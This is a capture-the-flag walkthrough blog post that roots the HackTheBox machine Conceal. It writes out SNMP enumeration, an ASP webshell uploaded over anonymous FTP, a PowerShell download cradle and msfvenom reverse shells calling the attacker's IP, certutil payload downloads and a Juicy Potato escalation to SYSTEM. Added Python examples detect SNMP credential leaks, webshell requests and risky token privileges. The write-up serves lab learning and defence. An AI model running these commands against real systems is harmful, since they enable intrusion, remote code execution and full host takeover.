Conceal HackTheBox WalkThrough

This is the Conceal HackTheBox machine walkthrough, the 23rd machine in our OSCP-like HTB Boxes series. In this writeup I have demonstrated step by step how I rooted the Conceal HackTheBox machine. But before diving into the hacking part, let us learn something about this box. It is a Windows machine with IP address 10.10.10.116, and its maker has assigned it the difficulty rating hard.

Since this machine is retired, you will need a VIP subscription at hackthebox.eu to access it. So first of all connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging the machine's IP 10.10.10.116. If all goes well, start hacking. As usual I started by scanning the machine. Scanning gives us an idea of how to proceed: it finds open and closed ports and tells us which services are running on them. I have used Nmap for this task and the result is given below:

Scanning

When I tried a stealth scan (-sS) of all TCP ports it reported no open ports, because a firewall filters every TCP port and blocks the scan. Then I performed a UDP scan (-sU) of the first 1000 ports, and it found two of them open.

$ sudo nmap -sU -sV -T4 -p1-1000 10.10.10.116

UDP scan in Conceal HackTheBox walkthrough

Nmap found UDP ports 161 and 500 open. An SNMP server is running on port 161 and ISAKMP on port 500. Let us run Nmap's default scripts (-sC) against these ports and see what they can find.

$ sudo nmap -sU -sC -T4 -p 500,161 10.10.10.116

UDP Scan with Default script
————————Snip————————
UDP Scan with Default script 1

The Nmap scan with default scripts revealed a lot of useful information. The snmp-netstat script showed that a large number of TCP ports are listening, and the ike-version script identified the Conceal OS as Windows Server 8. Since port 500 is open and an IKE VPN server is running on it, we can reach those listening ports only after connecting to the IKE VPN. So let us enumerate these two ports further to gather the information needed for our VPN configuration file.

Our next step is to enumerate these two ports and gather as much information as we can. If you want more information, such as the number of users and their names, the exact OS version and service details on the Conceal machine, you can run the following Nmap commands. They execute all the snmp and ike scripts present in /usr/share/nmap/scripts/ against ports 161 and 500 respectively.

$ sudo nmap -sU -p161 --script "snmp*" 10.10.10.116

$ sudo nmap -sU -p500 --script "ike*" 10.10.10.116

We have got information about the open ports and the services running on them. Now let us use service-specific tools to enumerate these ports further. For SNMP enumeration I have used snmp-check.pl (a Perl script for SNMP enumeration). Simply copy its content from here, save it in a file named snmp-check.pl and run it as shown below. You can also use the Kali built-in tool $snmpwalk for this purpose, but snmp-check.pl presents the information in a more human-readable form. I have used both tools to show you the result.

SNMP Enumeration ~ 161

$ snmpwalk -v 2c -c public 10.10.10.116

snmpwalk result  in Conceal HackTheBox walkthrough
————————Snip————————

$ vi snmp-check.pl

$ perl snmp-check.pl -t 10.10.10.116 -p 161

snmp-check result in conceal htb
————————Snip————————

Both tools found the IKE VPN pre-shared key (PSK), stored as a hash. When I looked this hash up on crackstation.net I got the password Dudecake1!.

IKE VPN password PSK – 9C8B1A372B1878851BE2C097031B6E43: Dudecake1!

Cracking IKE VPN password on crackstation.net
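The lesson for a defender here is that a read-only SNMP agent with the default community string public handed out the VPN pre-shared key. Below is an added example, not part of this walkthrough or of any tool mentioned in it, that parses snmpwalk-style output and flags string values that look like leaked credentials, so you can audit what your own SNMP agent exposes. The sample walk is constructed for illustration; the OIDs are the standard sysDescr, sysContact, sysName, sysLocation, hrSWRunName/hrSWRunParameters and interface counter entries, and the PSK string mirrors the one found above.

```python
import re

# Constructed sample in snmpwalk's output format (illustrative, not the real
# walk of the box). sysContact/sysLocation and the host-resources process
# table (hrSWRunParameters, which exposes process command lines) are the
# usual places where admins unintentionally leave secrets.
SAMPLE_SNMPWALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: x86 Family - Software: Windows"
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.2.1000 = STRING: "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.5.1000 = STRING: "-k netsvcs"
iso.3.6.1.2.1.2.2.1.10.1 = Counter32: 123456
"""

# One snmpwalk line: <oid> = <TYPE>: <value>
LINE_RE = re.compile(r'^(?P<oid>\S+)\s*=\s*(?P<type>[\w-]+):\s*(?P<value>.*)$')
# Words that usually sit next to a secret, and long hex runs (hashes, keys).
CRED_WORDS = re.compile(r'\b(psk|pre-?shared|password|passwd|pwd|secret|api[_-]?key|token)\b', re.I)
HEX_BLOB = re.compile(r'\b[0-9a-f]{32,}\b', re.I)


def parse_snmpwalk(text):
    """Yield (oid, type, value) tuples; STRING values lose their surrounding quotes."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # banner or wrapped line; ignore
        value = m.group('value')
        if m.group('type') == 'STRING' and len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        yield m.group('oid'), m.group('type'), value


def find_credential_leaks(text):
    """Return the STRING entries whose value looks like a credential or key material."""
    findings = []
    for oid, typ, value in parse_snmpwalk(text):
        if typ != 'STRING':
            continue
        reasons = []
        if CRED_WORDS.search(value):
            reasons.append('credential keyword')
        if HEX_BLOB.search(value):
            reasons.append('long hex blob (hash or key material)')
        if reasons:
            findings.append({'oid': oid, 'value': value, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for hit in find_credential_leaks(SAMPLE_SNMPWALK):
        print(f"{hit['oid']}: {hit['value']!r}  <- {', '.join(hit['reasons'])}")
```

Feed it the saved output of snmpwalk against your own hosts; any hit is a reason to scrub the value and, more importantly, to change the community string and restrict who can reach UDP 161.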

IPsec Enumeration ~ 500

$ike-scan against port 500 revealed that the IKE version is v1, authentication uses a pre-shared key and the encryption is 3DES. All this information is needed to build the VPN configuration file.

$ sudo ike-scan -M 10.10.10.116

IKE-Scan result on conceal

I am going to use the $strongswan VPN client to connect to the VPN server running on the Conceal machine.

$ sudo apt install strongswan # to install on your Kali machine

You will also need to install these additional plugins:

$ sudo apt install libstrongswan-standard-plugins libstrongswan-extra-plugins

Once they are installed, let us edit our VPN configuration file. Since we are going to connect using the IPsec protocol, we need to edit the IPsec configuration file, which is located in the /etc/ directory. Simply put the following configuration in ipsec.conf. Make sure to replace left=10.10.14.9 with your own tun0 IP.

$ tail -16 /etc/ipsec.conf

config setup
        charondebug="all"
        uniqueids=yes
        strictcrlpolicy=no

conn conceal
        authby=secret
        auto=add
        ike=3des-sha1-modp1024!
        esp=3des-sha1!
        type=transport
        keyexchange=ikev1
        left=10.10.14.9
        right=10.10.10.116
        rightsubnet=10.10.10.116[tcp]

Also put the following line in the ipsec.secrets file, again replacing 10.10.14.9 with your tun0 IP.

$ sudo head -3 /etc/ipsec.secrets

# This file holds shared secrets or RSA private keys for authentication.
10.10.14.9 10.10.10.116: PSK "Dudecake1!"
# RSA private key for this host, authenticating it to any other host

IPsec configuration file in Conceal HackTheBox walkthrough

For more information on configuring IPsec VPN files, check this link. Let us connect to the VPN.

Connecting with IPsec VPN

$ sudo ipsec restart

$ sudo ipsec up conceal

$ sudo ipsec status

Connecting to IKE VPN server using IPSec VPN configuration file

We are connected to the IPsec VPN. Let us perform the Nmap scan again to check which TCP ports are now reachable.

$ sudo nmap -sC -sV -sT -oA nmap/tcp_scan 10.10.10.116

TCP scan during Conceal HackTheBox walkthrough

Nmap found ports 21, 80, 135, 139 and 445 open. A Microsoft ftpd server is running on port 21 and the ftp-anon script revealed that anonymous login is allowed. So I immediately logged in with the credentials anonymous:anonymous. After some enumeration I found that we can upload files to this server. To test this I created a simple text file test.txt, uploaded it and then tried to access it at the URL http://10.10.10.116/test.txt.

We can't access the file there, so it may have been uploaded to some other folder. To find out, I performed directory brute-forcing with the tool $dirsearch and the wordlist small.txt, which is present in the directory /usr/share/wordlists/dirb/ on Kali/Parrot.

Conceal Webpage

$ sudo dirsearch -w /usr/share/wordlists/dirb/small.txt -u http://10.10.10.116/ -e all -t 40 | tee dirsearch.out

Directory bruteforcing in conceal hackthebox machine during walkthrough

Directory brute-forcing found a folder named upload, and our uploaded file is present in it. So the URL where we can access our uploaded file is http://10.10.10.116/upload/test.txt.

My next step is to upload a webshell so that we can execute commands on the Conceal machine and get a reverse shell back to our Kali machine. Since it is an IIS server, I tried uploading aspx and asp webshells, because IIS commonly serves these file types. When I uploaded a webshell with the aspx extension it did not execute, because the aspx extension is blocked on the server. But when I uploaded an asp webshell and opened it in the browser, it executed without any trouble and we can now run OS commands through it. The link to the webshell is this.

Login into FTP & Uploading Webshell

$ ftp 10.10.10.116

Name: anonymous

Password: anonymous

ftp> put webshell.asp

Uploading asp webshell through ftp client

After uploading, access the webshell at http://10.10.10.116/upload/webshell.asp.

$ ipconfig

Remote code Execution on conceal Hackthebox machine
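The upload folder being served as script content is what turned an anonymous FTP write into remote code execution. As an added example (not from the walkthrough or from IIS itself), here is detection logic run over a constructed IIS W3C log excerpt: it flags requests that execute a script file under /upload/ and requests whose query string carries a command-style parameter or a PowerShell download cradle like the one used above. The field names are the standard IIS W3C ones; the log lines, client addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (illustrative; not a log from the box).
# The paths and the encoded PowerShell query mirror the requests made above.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-01-01 10:00:01 10.10.10.116 GET /index.html - 80 - 10.10.14.20 Mozilla/5.0 - 200 0 0 10
2021-01-01 10:00:02 10.10.10.116 GET /upload/test.txt - 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 15
2021-01-01 10:00:05 10.10.10.116 GET /upload/webshell.asp cmd=ipconfig 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 120
2021-01-01 10:00:09 10.10.10.116 GET /upload/webshell.asp cmd=powershell+%22IEX(New-Object+Net.webClient).downloadString(%27http%3A%2F%2F10.10.14.9%2Fnishang.ps1%27)%22 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 340
"""

# Extensions IIS hands to a script engine; a request for one of these under an
# upload directory means uploaded content is being executed, not served.
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".ashx", ".asmx", ".cer", ".php", ".jsp")
UPLOAD_PREFIXES = ("/upload/",)
# Query parameter names webshells typically use to receive a command.
COMMAND_PARAMS = {"cmd", "exec", "command", "c", "run"}
# Keywords that show up in download cradles and hands-on-keyboard activity.
COMMAND_MARKERS = re.compile(
    r"\b(powershell|iex|downloadstring|cmd\.exe|certutil|whoami|net\s+user)\b", re.I)


def parse_w3c_log(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # header can change mid-file; track the latest
            continue
        if line.startswith("#"):
            continue                    # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue                    # truncated or malformed line; skip it
        yield dict(zip(fields, values))


def detect_webshell_requests(text):
    """Return alerts for requests that look like uploaded-script execution."""
    alerts = []
    for entry in parse_w3c_log(text):
        stem = entry["cs-uri-stem"].lower()
        raw_query = entry["cs-uri-query"]
        decoded = unquote_plus(raw_query) if raw_query != "-" else ""
        reasons = []
        if stem.startswith(UPLOAD_PREFIXES) and stem.endswith(SCRIPT_EXTENSIONS):
            reasons.append("script executed from upload directory")
        params = {p.split("=", 1)[0].lower() for p in decoded.split("&") if p}
        if params & COMMAND_PARAMS:
            reasons.append("command-style query parameter")
        keyword_hit = COMMAND_MARKERS.search(decoded) is not None
        if keyword_hit:
            reasons.append("shell/download keywords in query")
        if reasons:
            alerts.append({
                "time": f"{entry['date']} {entry['time']}",
                "client": entry["c-ip"],
                "uri": entry["cs-uri-stem"],
                "query": decoded,
                "reasons": reasons,
                "severity": "high" if keyword_hit else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_webshell_requests(SAMPLE_IIS_LOG):
        print(f"[{alert['severity']}] {alert['time']} {alert['client']} "
              f"{alert['uri']} {alert['query']!r}: {'; '.join(alert['reasons'])}")
```

The first rule alone would have caught webshell.asp on its very first hit, before any command was sent; the fix on the server side is the same one the box half-applied to .aspx: no script mapping at all for directories that accept uploads.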

We have got remote code execution on Conceal. Let us upgrade this to an interactive PowerShell so that we can work on the Conceal machine from a command prompt. For this I am using nishang's Invoke-PowerShellTcp.ps1 script; the nishang repository link is this. First clone the repository into your /opt folder, then copy Shells/Invoke-PowerShellTcp.ps1 to a new file nishang.ps1 in the current directory and append the line Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4321 at the bottom of nishang.ps1. Now start a python3 web server in the same folder to host this file, and in another window start a netcat listener on port 4321.

$ sudo git clone https://github.com/samratashok/nishang /opt/nishang

$ cd /home/deepak/HTB/Boxes/Conceal

$ cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1

$ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4321' >> nishang.ps1

$ sudo python3 -m http.server 80

Now run

powershell "IEX(New-Object Net.webClient).downloadString('http://10.10.14.9/nishang.ps1')"

in the webshell, or alternatively open the URL

http://10.10.10.116/upload/webshell.asp?cmd=powershell+%22IEX(New-Object+Net.webClient).downloadString(%27http%3A%2F%2F10.10.14.9%2Fnishang.ps1%27)%22 to download nishang.ps1 and execute it on the Conceal machine.

$ nc -nvlp 4321

$ whoami

Getting User shell in Conceal htb

We have got an interactive PowerShell as the user Destitute. Let us capture the user flag.

Capture User Flag

$ type C:\Users\Destitute\Desktop\proof.txt

Capturing user flag in conceal HTB machine

Privilege Escalation

To escalate privileges to administrator we first have to find a privilege escalation vector.

Finding PrivEsc Vector

The $ whoami /priv command showed that the SeImpersonatePrivilege token privilege is enabled. This is actually a vulnerability and can be exploited with the Juicy Potato exploit. For more info about this vulnerability check this link; the Juicy Potato link is this, and the link to the JuicyPotato.exe binary is this. When I exploited this machine with Juicy Potato I easily got an admin shell. So our PrivEsc vector here is privilege escalation through access token manipulation. Check here for a HackTheBox machine with a similar PrivEsc vector.

Finding PrivEsc vector in Conceal HTB
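To see at a glance whether a token holds a privilege like this one, here is an added Python example (not from the walkthrough, and not a tool it mentions) that parses the output of whoami /priv and reports the high-risk privileges the token holds. It goes a little beyond the page by listing a few other privileges that are flagged in the same kind of triage; the descriptions are what the privilege permits, taken from Windows' own wording. The sample output is constructed in the exact layout whoami /priv prints.

```python
# Constructed sample of `whoami /priv` output (same layout as the real
# command; the rows are for illustration and are not from the box).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that by themselves let a process escape its security context.
# A held privilege matters whether it shows Enabled or Disabled, because the
# process can enable any privilege its token already holds.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a client after authentication (the Potato family of exploits builds on this)",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token (abused the same way)",
    "SeDebugPrivilege": "debug programs, i.e. open any process including SYSTEM ones",
    "SeBackupPrivilege": "back up files and directories, bypassing read ACLs",
    "SeRestorePrivilege": "restore files and directories, bypassing write ACLs",
    "SeTakeOwnershipPrivilege": "take ownership of files or other objects",
    "SeLoadDriverPrivilege": "load and unload device drivers",
}


def parse_whoami_priv(text):
    """Return {privilege name: state} from `whoami /priv` output."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):        # the ===== separator marks the table start
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        # Description may span several words; name is first, state is last.
        privs[parts[0]] = parts[-1]
    return privs


def assess_token(privs):
    """List the held privileges that are on the high-risk list, with their state."""
    return [
        {"privilege": name, "state": state, "risk": HIGH_RISK[name]}
        for name, state in privs.items()
        if name in HIGH_RISK
    ]


if __name__ == "__main__":
    for finding in assess_token(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{finding['privilege']} ({finding['state']}): {finding['risk']}")
```

IIS worker-process and most service identities hold SeImpersonatePrivilege by default, which is why a webshell running inside w3wp.exe inherits it; the practical mitigations are keeping uploaded content from being executed as script in the first place and alerting on unexpected child processes of w3wp.exe, rather than trying to strip a privilege the web server needs.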

To exploit this vulnerability we need a program that Juicy Potato will execute when we run it. For this I have created shell.exe with $msfvenom, which will give us a shell in $msfconsole. So create shell.exe using $msfvenom and transfer it to the Conceal machine.

Creating & Uploading Shell

On Kali Machine

$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.9 LPORT=4567 --arch x64 -f exe > shell.exe

$ python3 -m http.server 8000

On Conceal Machine

$ cd C:\Users\Destitute

$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/shell.exe" "shell.exe"

$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/JuicyPotato.exe" "JuicyPotato.exe"

Downloading malware in Conceal Machine

We have successfully downloaded both binaries to the Conceal machine. Let us get an admin shell by exploiting the vulnerability.

Getting Admin Shell

On Kali Machine

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set LHOST 10.10.14.9

msf6 exploit(multi/handler) > set LPORT 4567

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > exploit

meterpreter > getuid

meterpreter > sysinfo

On Conceal Machine

$ & "C:\Users\Destitute\JuicyPotato.exe" -l 1337 -p "C:\Users\Destitute\shell.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

Getting root shell during Conceal Hackthebox walkthrough

We are NT AUTHORITY\SYSTEM now, the highest privilege level on Windows. Let us capture the root flag from the Administrator's directory.

Capture Root Flag

meterpreter > search -f proof.txt "C:\Users"

meterpreter > cat "c:\Users\Administrator\Desktop\proof.txt"

Capture root flag in conceal htb

This was how I rooted the Conceal HackTheBox machine. I learnt a lot from this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion feel free to write to us at [email protected].

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/